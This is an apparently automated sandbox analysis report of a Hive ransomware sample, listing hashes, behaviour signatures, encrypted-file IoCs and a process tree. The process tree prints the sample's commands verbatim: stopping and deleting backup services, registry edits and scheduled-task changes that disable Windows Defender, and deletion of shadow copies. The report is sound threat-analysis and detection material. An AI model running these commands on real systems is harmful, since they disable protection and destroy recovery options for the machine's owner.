Analysis
-
max time kernel
150s -
max time network
120s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
03-08-2021 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a2112.exe
Resource
win7v20210410
General
-
Target
a2112.exe
-
Size
919KB
-
MD5
4cd42e7aac7f89edf5764b699b2800d0
-
SHA1
f309daa9650485d6ef6ceeccdc8c014d425a00fd
-
SHA256
67ab2abe18b060275763e1d0c73d27c1e61b69097232ed9d048d41760a4533ef
-
SHA512
0dcf0a9f4b15a355c3da11fbcd2276e9d96bd7b767c3cc2cdf17e3fc0b47483f3ef7f6953fd0ca232c3e9a8603be34b0f6c9d41eaac32ffff66755d8d2400440
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 3676 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2100 bcdedit.exe 1928 bcdedit.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ExportPush.png => C:\Users\Admin\Pictures\ExportPush.png.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5YjdswSQmDtEWQtBb1kN8V6.w2tnk a2112.exe File opened for modification C:\Users\Admin\Pictures\ExportPush.png.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5YjdswSQmDtEWQtBb1kN8V6.w2tnk a2112.exe File renamed C:\Users\Admin\Pictures\InitializeImport.crw => C:\Users\Admin\Pictures\InitializeImport.crw.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5binOCz99xEU7BjS15giVcj.w2tnk a2112.exe File opened for modification C:\Users\Admin\Pictures\InitializeImport.crw.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5binOCz99xEU7BjS15giVcj.w2tnk a2112.exe File renamed C:\Users\Admin\Pictures\UnblockShow.tif => C:\Users\Admin\Pictures\UnblockShow.tif.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5an7hnHNcYDWyi8Of8cczdk.w2tnk a2112.exe File opened for modification C:\Users\Admin\Pictures\UnblockShow.tif.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5an7hnHNcYDWyi8Of8cczdk.w2tnk a2112.exe -
Stops running service(s) 3 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5bxCfys3iE3JloPiMMIKdRn.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-80.png a2112.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\Klondike\Goal_3.jpg a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Images\moji_mask.contrast-standard.png a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\faf_icons.png a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\ProjectionPlanar.scale-140.png a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-24.png a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\questfallback.png a2112.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Exchange.scale-150.png a2112.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBOB6.CHM a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-200_contrast-black.png a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning_2x.png a2112.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\fwdM_HOW_TO_DECRYPT a2112.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de_2x.gif a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\ui-strings.js a2112.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrvi.rll a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconOpenInRefocus.scale-200.png a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-pl.xrm-ms.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5ZhGwgLYV5lUDmwbpr8C5AP.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690.XSL a2112.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsWideTile.contrast-black_scale-125.png a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5ZKlb43Nyx-XmOr2FIKpRhX.w2tnk a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\PeopleSmallTile.scale-100.png a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js a2112.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\AccessMessageDismissal.txt.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5acP_ZIPrhveV70wCFEBZcM.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\hyph_en_GB.dic.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5bUI58ZufTXX4voy3SUQvsY.w2tnk a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\SmallTile.scale-200.png a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELM.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5asklj9wZpcXRzTPnrQLA0C.w2tnk a2112.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5YNZz4qqxAJYShIUAfFaqRd.w2tnk a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_F_COL.HXK a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\tr\msipc.dll.mui a2112.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac a2112.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\manifest.json a2112.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5ZcePf4EAAIGN59c0GhQB96.w2tnk a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations.png.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5ZHlc5qrZkJdoJJA2t1qZYx.w2tnk a2112.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5aMKs_kgtVEAwOGDbMpYxsQ.w2tnk a2112.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml a2112.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-30_altform-unplated.png a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\ui-strings.js a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\fwdM_HOW_TO_DECRYPT.txt a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalDemoR_BypassTrial180-ppd.xrm-ms a2112.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5Y_oNdtUJwJV3_V-BfJ7TV8.w2tnk a2112.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\Popup_3.jpg a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\tz_60x42.png a2112.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\fwdM_HOW_TO_DECRYPT.txt a2112.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-pl.xrm-ms a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Grace-ppd.xrm-ms.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5bzx9AS6JXiMTzmGL_cNIEa.w2tnk a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\PREVIEW.GIF.fZqwVLWmK4vXmm3OyFORNS1yi1_BqaIay2jNAmwxe5bDPJP74I06QIyGV9HWsHpY.w2tnk a2112.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\fwdM_HOW_TO_DECRYPT a2112.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_TW.properties a2112.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ppd.xrm-ms a2112.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-60_contrast-white.png a2112.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1016 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4212 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe 1420 powershell.exe 1420 powershell.exe 1420 powershell.exe 636 a2112.exe 636 a2112.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 3520 wevtutil.exe Token: SeBackupPrivilege 3520 wevtutil.exe Token: SeSecurityPrivilege 2892 wevtutil.exe Token: SeBackupPrivilege 2892 wevtutil.exe Token: SeSecurityPrivilege 196 wevtutil.exe Token: SeBackupPrivilege 196 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2660 WMIC.exe Token: SeSecurityPrivilege 2660 WMIC.exe Token: SeTakeOwnershipPrivilege 2660 WMIC.exe Token: SeLoadDriverPrivilege 2660 WMIC.exe Token: SeSystemProfilePrivilege 2660 WMIC.exe Token: SeSystemtimePrivilege 2660 WMIC.exe Token: SeProfSingleProcessPrivilege 2660 WMIC.exe Token: SeIncBasePriorityPrivilege 2660 WMIC.exe Token: SeCreatePagefilePrivilege 2660 WMIC.exe Token: SeBackupPrivilege 2660 WMIC.exe Token: SeRestorePrivilege 2660 WMIC.exe Token: SeShutdownPrivilege 2660 WMIC.exe Token: SeDebugPrivilege 2660 WMIC.exe Token: SeSystemEnvironmentPrivilege 2660 WMIC.exe Token: SeRemoteShutdownPrivilege 2660 WMIC.exe Token: SeUndockPrivilege 2660 WMIC.exe Token: SeManageVolumePrivilege 2660 WMIC.exe Token: 33 2660 WMIC.exe Token: 34 2660 WMIC.exe Token: 35 2660 WMIC.exe Token: 36 2660 WMIC.exe Token: SeIncreaseQuotaPrivilege 1156 WMIC.exe Token: SeSecurityPrivilege 1156 WMIC.exe Token: SeTakeOwnershipPrivilege 1156 WMIC.exe Token: SeLoadDriverPrivilege 1156 WMIC.exe Token: SeSystemProfilePrivilege 1156 WMIC.exe Token: SeSystemtimePrivilege 1156 WMIC.exe Token: SeProfSingleProcessPrivilege 1156 WMIC.exe Token: SeIncBasePriorityPrivilege 1156 WMIC.exe Token: SeCreatePagefilePrivilege 1156 WMIC.exe Token: SeBackupPrivilege 1156 WMIC.exe Token: SeRestorePrivilege 1156 WMIC.exe Token: SeShutdownPrivilege 1156 WMIC.exe Token: SeDebugPrivilege 1156 WMIC.exe Token: SeSystemEnvironmentPrivilege 1156 WMIC.exe Token: SeRemoteShutdownPrivilege 1156 WMIC.exe Token: SeUndockPrivilege 1156 WMIC.exe Token: SeManageVolumePrivilege 1156 WMIC.exe Token: 33 1156 WMIC.exe Token: 34 1156 WMIC.exe Token: 35 1156 WMIC.exe Token: 36 1156 WMIC.exe Token: SeIncreaseQuotaPrivilege 1156 WMIC.exe Token: SeSecurityPrivilege 1156 WMIC.exe Token: SeTakeOwnershipPrivilege 1156 WMIC.exe Token: SeLoadDriverPrivilege 1156 WMIC.exe Token: SeSystemProfilePrivilege 1156 WMIC.exe Token: SeSystemtimePrivilege 1156 WMIC.exe Token: SeProfSingleProcessPrivilege 1156 WMIC.exe Token: SeIncBasePriorityPrivilege 1156 WMIC.exe Token: SeCreatePagefilePrivilege 1156 WMIC.exe Token: SeBackupPrivilege 1156 WMIC.exe Token: SeRestorePrivilege 1156 WMIC.exe Token: SeShutdownPrivilege 1156 WMIC.exe Token: SeDebugPrivilege 1156 WMIC.exe Token: SeSystemEnvironmentPrivilege 1156 WMIC.exe Token: SeRemoteShutdownPrivilege 1156 WMIC.exe Token: SeUndockPrivilege 1156 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 636 wrote to memory of 2736 636 a2112.exe 79 PID 636 wrote to memory of 2736 636 a2112.exe 79 PID 636 wrote to memory of 2288 636 a2112.exe 80 PID 636 wrote to memory of 2288 636 a2112.exe 80 PID 2288 wrote to memory of 1276 2288 cmd.exe 81 PID 2288 wrote to memory of 1276 2288 cmd.exe 81 PID 2288 wrote to memory of 2316 2288 cmd.exe 82 PID 2288 wrote to memory of 2316 2288 cmd.exe 82 PID 2288 wrote to memory of 2296 2288 cmd.exe 83 PID 2288 wrote to memory of 2296 2288 cmd.exe 83 PID 2288 wrote to memory of 2132 2288 cmd.exe 84 PID 2288 wrote to memory of 2132 2288 cmd.exe 84 PID 2288 wrote to memory of 1152 2288 cmd.exe 85 PID 2288 wrote to memory of 1152 2288 cmd.exe 85 PID 2288 wrote to memory of 816 2288 cmd.exe 86 PID 2288 wrote to memory of 816 2288 cmd.exe 86 PID 2288 wrote to memory of 2256 2288 cmd.exe 87 PID 2288 wrote to memory of 2256 2288 cmd.exe 87 PID 2288 wrote to memory of 4064 2288 cmd.exe 88 PID 2288 wrote to memory of 4064 2288 cmd.exe 88 PID 2288 wrote to memory of 4032 2288 cmd.exe 89 PID 2288 wrote to memory of 4032 2288 cmd.exe 89 PID 2288 wrote to memory of 3148 2288 cmd.exe 90 PID 2288 wrote to memory of 3148 2288 cmd.exe 90 PID 2288 wrote to memory of 2068 2288 cmd.exe 91 PID 2288 wrote to memory of 2068 2288 cmd.exe 91 PID 2288 wrote to memory of 3872 2288 cmd.exe 92 PID 2288 wrote to memory of 3872 2288 cmd.exe 92 PID 2288 wrote to memory of 812 2288 cmd.exe 93 PID 2288 wrote to memory of 812 2288 cmd.exe 93 PID 2288 wrote to memory of 3032 2288 cmd.exe 94 PID 2288 wrote to memory of 3032 2288 cmd.exe 94 PID 2288 wrote to memory of 380 2288 cmd.exe 95 PID 2288 wrote to memory of 380 2288 cmd.exe 95 PID 2288 wrote to memory of 3648 2288 cmd.exe 96 PID 2288 wrote to memory of 3648 2288 cmd.exe 96 PID 2288 wrote to memory of 1868 2288 cmd.exe 97 PID 2288 wrote to memory of 1868 2288 cmd.exe 97 PID 2288 wrote to memory of 3936 2288 cmd.exe 98 PID 2288 wrote to memory of 3936 2288 cmd.exe 98 PID 2288 wrote to memory of 3728 2288 cmd.exe 99 PID 2288 wrote to memory of 3728 2288 cmd.exe 99 PID 2288 wrote to memory of 200 2288 cmd.exe 100 PID 2288 wrote to memory of 200 2288 cmd.exe 100 PID 2288 wrote to memory of 724 2288 cmd.exe 101 PID 2288 wrote to memory of 724 2288 cmd.exe 101 PID 2288 wrote to memory of 2500 2288 cmd.exe 102 PID 2288 wrote to memory of 2500 2288 cmd.exe 102 PID 2288 wrote to memory of 1844 2288 cmd.exe 103 PID 2288 wrote to memory of 1844 2288 cmd.exe 103 PID 2288 wrote to memory of 916 2288 cmd.exe 104 PID 2288 wrote to memory of 916 2288 cmd.exe 104 PID 2288 wrote to memory of 1016 2288 cmd.exe 105 PID 2288 wrote to memory of 1016 2288 cmd.exe 105 PID 2288 wrote to memory of 1964 2288 cmd.exe 106 PID 2288 wrote to memory of 1964 2288 cmd.exe 106 PID 2288 wrote to memory of 196 2288 cmd.exe 107 PID 2288 wrote to memory of 196 2288 cmd.exe 107 PID 2288 wrote to memory of 2672 2288 cmd.exe 108 PID 2288 wrote to memory of 2672 2288 cmd.exe 108 PID 2288 wrote to memory of 2376 2288 cmd.exe 109 PID 2288 wrote to memory of 2376 2288 cmd.exe 109 PID 2288 wrote to memory of 2560 2288 cmd.exe 110 PID 2288 wrote to memory of 2560 2288 cmd.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\a2112.exe"C:\Users\Admin\AppData\Local\Temp\a2112.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c LhY5kBPeHs.bat >NUL 2>NUL2⤵PID:2736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c LhY5kBPeHs.bat >NUL 2>NUL2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\sc.exesc stop "LanmanWorkstation"3⤵PID:1276
-
-
C:\Windows\system32\sc.exesc stop "SamSs"3⤵PID:2316
-
-
C:\Windows\system32\sc.exesc stop "SDRSVC"3⤵PID:2296
-
-
C:\Windows\system32\sc.exesc stop "SstpSvc"3⤵PID:2132
-
-
C:\Windows\system32\sc.exesc stop "UI0Detect"3⤵PID:1152
-
-
C:\Windows\system32\sc.exesc stop "vmicvss"3⤵PID:816
-
-
C:\Windows\system32\sc.exesc stop "VSS"3⤵PID:2256
-
-
C:\Windows\system32\sc.exesc stop "wbengine"3⤵PID:4064
-
-
C:\Windows\system32\sc.exesc stop "WebClient"3⤵PID:4032
-
-
C:\Windows\system32\sc.exesc stop "UnistoreSvc_130b0"3⤵PID:3148
-
-
C:\Windows\system32\sc.exesc delete "LanmanWorkstation"3⤵PID:2068
-
-
C:\Windows\system32\sc.exesc delete "SamSs"3⤵PID:3872
-
-
C:\Windows\system32\sc.exesc delete "SDRSVC"3⤵PID:812
-
-
C:\Windows\system32\sc.exesc delete "SstpSvc"3⤵PID:3032
-
-
C:\Windows\system32\sc.exesc delete "UI0Detect"3⤵PID:380
-
-
C:\Windows\system32\sc.exesc delete "vmicvss"3⤵PID:3648
-
-
C:\Windows\system32\sc.exesc delete "VSS"3⤵PID:1868
-
-
C:\Windows\system32\sc.exesc delete "wbengine"3⤵PID:3936
-
-
C:\Windows\system32\sc.exesc delete "WebClient"3⤵PID:3728
-
-
C:\Windows\system32\sc.exesc delete "UnistoreSvc_130b0"3⤵PID:200
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:724
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:2500
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:1844
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:916
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵PID:1016
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵PID:1964
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵PID:196
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵PID:2672
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵PID:2376
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:2560
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:3992
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:1572
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f3⤵PID:1264
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2100
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:1928
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:1152
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:2272
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:1104
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:3264
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:3148
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f3⤵PID:3960
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f3⤵PID:3888
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f3⤵PID:696
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:380
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:1912
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2888
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:200
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:724
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2500
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1844
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:916
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1016
-
-
